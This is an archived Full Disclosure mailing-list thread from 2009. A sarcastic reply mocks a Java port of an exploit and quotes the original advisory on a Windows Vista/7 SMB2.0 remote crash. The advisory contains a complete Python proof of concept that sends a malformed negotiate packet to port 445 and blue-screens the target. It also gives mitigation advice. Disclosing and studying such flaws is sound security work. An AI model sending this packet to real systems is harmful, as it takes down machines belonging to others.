Full Disclosure mailing list archives

Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

From: "r1d1nd1rty" <r1d1nd1rty () hush com>
Date: Mon, 14 Sep 2009 13:18:38 -0400

Oh WOW! More exploit code ported to Java!!

Hello Randy,
    Not everyone would have gone to all the trouble you did for me 
and I want you to know how much I appreciate it. It seems that you 
are always going above and beyond the call of duty. No wonder so 
many people are happy and proud to call you an elite h4x0r. It was 
really wonderful of you to direct port Laurent's SMB2.0 BSOD python 
exploit code in to Java and call it your own, and I'll never be 
able to thank you enough. 

However, in doing so, an apology to Laurent AND the FD list for the 
dissemination of your Java port and post to FD mailing list is 
therefore required. There is simply no need for Java in any 
circumstances, and it is truly a shame to see such a wonderful 
exploit treated in such a horrendous way. Perhaps if you added, 
removed or improved the exploit, an apology would not have been 
required... but you didn't.

Thanks for you time,
  /rd

for dem geeks rdy to bounce 'em

Ya my number two on some old school DJ Screw
You can't arrest me, plus you can't sue
This is a message to the laws, tell 'em "We hate you"
I could be tough tell 'em that they shoulda known
Tippin down, sittin crooked on my chrome
Bookin my phone, findin a chick I wanna bone
Like they couldn't stop me
I'm bout to pull up at your home, and it's on

...

It's fun :-) 
 On Mon, September 14, 2009 12:14 pm, D-vice wrote:

You wrote an exploit in java....


*head explodes*

On Mon, Sep 14, 2009 at 6:02 AM, Randal T. Rioux
<randy_at_procyonlabs.com>wrote:

After testing my version of the exploit (using Java instead of

Python) I

tried it against a Windows Server 2008 R2 installation - it

went down.


http://www.procyonlabs.com/software/smb2_bsoder

Randy


laurent gaffie wrote:

Advisory updated :


=============================================
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffi�
- Severity: High
=============================================

I. VULNERABILITY

  >> > -------------------------

Windows Vista, Server 2008 < R2, 7 RC :
SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND

  >> > -------------------------

Windows vista and newer Windows comes with a new SMB version

named

SMB2.

  >> > See:

http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#S
erver_Message_Block_2.0

for more details.

III. DESCRIPTION

  >> > -------------------------

[Edit]Unfortunatly this SMB2 security issue is specificaly

due to a MS

patch, for another SMB2.0 security issue:
KB942624 (MS07-063)
Installing only this specific update on Vista SP0 create the

following

issue:

SRV2.SYS fails to handle malformed SMB headers for the

NEGOTIATE

PROTOCOL REQUEST functionnality.
The NEGOTIATE PROTOCOL REQUEST is the first SMB query a

client send to

SMB server, and it's used to identify the SMB dialect that

will be

used

for futher communication.

IV. PROOF OF CONCEPT

  >> > -------------------------


Smb-Bsod.py:

#!/usr/bin/python
#When SMB2.0 recieve a "&" char in the "Process Id High" SMB

header

field

#it dies with a PAGE_FAULT_IN_NONPAGED_AREA error

from socket import socket

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be

"\x00\x00"

"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

V. BUSINESS IMPACT

  >> > -------------------------

An attacker can remotly crash any Vista/Windows 7 machine

with SMB

enable.

Windows Xp, 2k, are NOT affected as they dont have this

driver.


VI. SYSTEMS AFFECTED

  >> > -------------------------

[Edit]Windows Vista All (64b/32b|SP1/SP2 fully updated), Win

Server

< R2, Windows 7 RC.

VII. SOLUTION

  >> > -------------------------

No patch available for the moment.
Close SMB feature and ports, until a patch is provided.
Configure your firewall properly
You can also follow the MS Workaround:
http://www.microsoft.com/technet/security/advisory/975497.mspx

VIII. REFERENCES

  >> > -------------------------

http://www.microsoft.com/technet/security/advisory/975497.mspx

http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-

security-advisory-975497-released.aspx


IX. CREDITS

  >> > -------------------------

This vulnerability has been discovered by Laurent Gaffi�
Laurent.gaffie{remove-this}(at)gmail.com <http://gmail.com>

X. REVISION HISTORY

  >> > -------------------------

September 7th, 2009: Initial release
September 11th, 2009: Revision 1.0 release

XI. LEGAL NOTICES

  >> > -------------------------

The information contained within this advisory is supplied

"as-is"

with no warranties or guarantees of fitness of use or

otherwise.

I accept no responsibility for any damage caused by the use or
misuse of this information.

XII.Personal Notes
-------------------------
Many persons have suggested to update this advisory for RCE

and not

BSOD:

  >> > It wont be done, if they find a way to execute code, they 
will publish

them advisory.


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D., (continued)
- Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. randomguy (Sep 09)
  - Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. James Matthews (Sep 09)
    - Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. D-vice (Sep 10)
    - Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. Mitch Oliver (Sep 10)
    - Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. laurent gaffie (Sep 11)
    - Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. Randal T. Rioux (Sep 13)
    - Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. D-vice (Sep 14)
    - Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. Randal T. Rioux (Sep 14)
    - Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. Randal T. Rioux (Sep 14)
    - Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOLREQUEST Remote B.S.O.D. mutiny (Sep 10)
- Re: Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D. r1d1nd1rty (Sep 14)